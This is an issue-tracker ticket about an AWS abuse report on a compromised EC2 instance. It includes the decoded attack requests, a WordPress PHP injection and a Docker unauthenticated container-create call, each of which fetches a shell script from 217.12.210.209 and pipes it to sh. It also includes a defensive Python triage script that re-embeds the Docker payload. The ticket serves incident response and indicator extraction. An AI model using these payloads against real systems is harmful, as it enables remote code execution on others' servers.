[FOLIO-2642] carrier-io-restored AWS security incident: wordpress_php_rce, docker_unauth_rce Created: 11/Jun/20 Updated: 17/Jun/20 Resolved: 17/Jun/20 |
|
| Status: | Closed |
| Project: | FOLIO |
| Components: | None |
| Affects versions: | None |
| Fix versions: | None |
| Type: | Task | Priority: | P1 |
| Reporter: | Peter Murray | Assignee: | John Malconian |
| Resolution: | Done | Votes: | 0 |
| Labels: | security | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original estimate: | Not Specified | ||
| Sprint: | DevOps: sprint 90 |
| Development Team: | FOLIO DevOps |
| Description |
|
Hello,

We've received a report(s) that your AWS resource(s)

AWS ID: 732722833398
Region: us-east-1
EC2 Instance Id: i-0b5799b100760ae41 [3.93.19.104]

has been implicated in activity which resembles attempts to access remote hosts on the internet without authorization. Activity of this nature is forbidden in the AWS Acceptable Use Policy (https://aws.amazon.com/aup/). We've included the original report below for your review.

Please take action to stop the reported activity and reply directly to this email with details of the corrective actions you have taken. If you do not consider the activity described in these reports to be abusive, please reply to this email with details of your use case.

If you're unaware of this activity, it's possible that your environment has been compromised by an external attacker, or a vulnerability is allowing your machine to be used in a way that it was not intended. We are unable to assist you with troubleshooting or technical inquiries. However, for guidance on securing your instance, we recommend reviewing the following resources:

If you require further assistance with this matter, you can take advantage of our developer forums: https://forums.aws.amazon.com/index.jspa

Or, if you are subscribed to a Premium Support package, you may reach out for one-on-one assistance here: https://console.aws.amazon.com/support/home#/case/create?issueType=technical

Please remember that you are responsible for ensuring that your instances and all applications are properly secured. If you require any further information to assist you in identifying or rectifying this issue, please let us know in a direct reply to this message.

Regards,

Case Number: 10688485529-1

Comments: You may find attached the logs from destinations which received the unexpected network traffic. Please note that the payload field in attached evidence logs is base64 encoded and the content must be handled with security precautions required to analyze potentially harmful malware.
{
  "traffic_start": "2020-06-10 17:54:43 GMT",
  "traffic_end": "2020-06-10 18:39:40 GMT",
  "source_ip": "3.93.19.104",
  "source_rdns": "ec2-3-93-19-104.compute-1.amazonaws.com",
  "destination_ips": [
    "15.185.200.0",
    "13.208.183.251"
  ],
  "destination_ports": [
    "80/tcp",
    "2375/tcp"
  ],
  "payload_classes": [
    "exploit:gen/docker_unauth_rce",
    "exploit:gen/wordpress_php_rce"
  ],
  "traffic_logs": [
    {
      "timestamp": 1591814380,
      "source_ip": "3.93.19.104",
      "source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
      "destination_ip": "15.185.200.0",
      "destination_port": 80,
      "destination_service": "http",
      "protocol": "tcp",
      "payload_class": "exploit:gen/wordpress_php_rce",
      "payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg=="
    },
    {
      "timestamp": 1591811683,
      "source_ip": "3.93.19.104",
      "source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
      "destination_ip": "13.208.183.251",
      "destination_port": 2375,
      "destination_service": "docker",
      "protocol": "tcp",
      "payload_class": "exploit:gen/docker_unauth_rce",
      "payload_data": "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"
    }
  ]
}
wordpress_php_rce payload after base64 decoding:
GET /?a=fetch&content=<php>die(shell_exec("curl%20217.12.210.209/tf.sh|sh"))</php> HTTP/1.1
host: 15.185.200.0:80
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
connection: close
accept-encoding: gzip
docker_unauth_rce payload after base64 decoding:
POST /v1.24/containers/create HTTP/1.1
host: 13.208.183.251:2375
user-agent: Go-http-client/1.1
content-length: 460
content-type: application/json
accept-encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"ubuntu","Volumes":null,"WorkingDir":"","Entrypoint":["/bin/bash","-c","apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O - 217.12.210.209/d.sh | sh;tail -f /dev/null"],"OnBuild":null,"Labels":null,"HostConfig":null,"NetworkingConfig":null}
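The two decodes above were done by hand. As an added example, not part of this ticket or of any FOLIO DevOps tooling, the following Python script does the same triage over an abuse report's evidence JSON: it base64-decodes each payload, splits the HTTP request into request line, headers and body, pulls the image and entrypoint out of the Docker /containers/create body, and lists the second-stage download locations (217.12.210.209/tf.sh and 217.12.210.209/d.sh here) that a responder would block at egress and hunt for on the compromised instance. The wordpress_php_rce payload is the base64 string quoted in the report; the docker_unauth_rce payload's base64 is re-encoded from the decoded request shown above, because the report's own encoded field for it is not preserved on this page; the REPORT dict is a trimmed, constructed copy of the evidence JSON. Function and constant names are the example's own.

```python
import base64
import json
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed: the docker_unauth_rce request as decoded in the ticket. The
# report's own base64 for it is not on the page, so it is re-encoded below.
DOCKER_REQUEST = (
    "POST /v1.24/containers/create HTTP/1.1\r\n"
    "host: 13.208.183.251:2375\r\n"
    "user-agent: Go-http-client/1.1\r\n"
    "content-length: 460\r\n"
    "content-type: application/json\r\n"
    "accept-encoding: gzip\r\n"
    "\r\n"
    '{"Hostname":"","Domainname":"","User":"","AttachStdin":false,'
    '"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,'
    '"StdinOnce":false,"Env":null,"Cmd":null,"Image":"ubuntu","Volumes":null,'
    '"WorkingDir":"","Entrypoint":["/bin/bash","-c","apt-get update \\u0026\\u0026 '
    'apt-get install -y wget cron;service cron start; wget -q -O - '
    '217.12.210.209/d.sh | sh;tail -f /dev/null"],"OnBuild":null,"Labels":null,'
    '"HostConfig":null,"NetworkingConfig":null}'
)

# Constructed: a trimmed copy of the report's evidence JSON. The first
# payload_data is the exact base64 string from the report.
REPORT = {
    "source_ip": "3.93.19.104",
    "traffic_logs": [
        {
            "destination_ip": "15.185.200.0",
            "destination_port": 80,
            "payload_class": "exploit:gen/wordpress_php_rce",
            "payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg==",
        },
        {
            "destination_ip": "13.208.183.251",
            "destination_port": 2375,
            "payload_class": "exploit:gen/docker_unauth_rce",
            "payload_data": base64.b64encode(DOCKER_REQUEST.encode()).decode(),
        },
    ],
}

# IPv4 literal, optionally followed by a path, e.g. 217.12.210.209/tf.sh.
# Lookarounds stop it matching inside longer digit runs or version strings.
IOC_RE = re.compile(r"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3})((?:/[\w.\-]+)*)(?![\d.])")


def parse_http_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def extract_iocs(text: str, exclude: List[str]) -> List[str]:
    """Return IP/path indicators found in text. The text is URL-decoded first
    so that 'curl%20217.12.210.209/tf.sh' yields '217.12.210.209/tf.sh';
    the report's own source/destination addresses are excluded."""
    found = set()
    for ip, path in IOC_RE.findall(unquote(text)):
        if all(int(octet) <= 255 for octet in ip.split(".")) and ip not in exclude:
            found.add(ip + path)
    return sorted(found)


def docker_create_summary(body: str) -> Dict[str, object]:
    """For a /containers/create body, pull out what the exposed daemon was
    asked to run: the image and the attacker-supplied entrypoint/cmd."""
    spec = json.loads(body)
    return {"image": spec.get("Image"), "entrypoint": spec.get("Entrypoint"),
            "cmd": spec.get("Cmd")}


def triage(report: Dict[str, object]) -> List[Dict[str, object]]:
    """Decode every evidence entry into a responder-oriented summary."""
    out = []
    for entry in report["traffic_logs"]:
        raw = base64.b64decode(entry["payload_data"]).decode("utf-8", "replace")
        req = parse_http_request(raw)
        item = {
            "class": entry["payload_class"],
            "destination": f'{entry["destination_ip"]}:{entry["destination_port"]}',
            "request": f'{req["method"]} {req["path"]}',
            "host_header": req["headers"].get("host"),
            "iocs": extract_iocs(raw, exclude=[entry["destination_ip"], report["source_ip"]]),
        }
        if req["path"].endswith("/containers/create"):
            item["docker"] = docker_create_summary(req["body"])
        out.append(item)
    return out


if __name__ == "__main__":
    for item in triage(REPORT):
        print(json.dumps(item, indent=2))
```

Both payloads pull their second stage from the same host, which is the first thing to block on the instance's security group and to search for in its shell history, cron entries and running containers; the Docker entry also shows why an unauthenticated daemon on 2375/tcp is equivalent to root on the host, since the caller picks the image and entrypoint.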
|
| Comments |
| Comment by Peter Murray [ 16/Jun/20 ] |
|
John Malconian: Did you see the rather insistent follow-up email from AWS this morning? It seems like they want some kind of answer from us by email. Did you have a chance to clean up this server? |
| Comment by John Malconian [ 16/Jun/20 ] |
|
Peter Murray: The server is still running but traffic is not allowed in and out. I have an outstanding request from Martin to take a backup of the influx dbs before I completely shut it down. Haven't seen the email from AWS yet, but I'll respond. |
| Comment by John Malconian [ 16/Jun/20 ] |
|
Sent response with our findings to AWS. |
| Comment by Peter Murray [ 16/Jun/20 ] |
|
Thanks! |
| Comment by John Malconian [ 16/Jun/20 ] |
|
I've taken influx db backups according to instructions from Martin and provided them to him via S3. The 'carrier-io-restored' instance has been terminated. I'm going to close this issue and follow up separately about a rebuild. |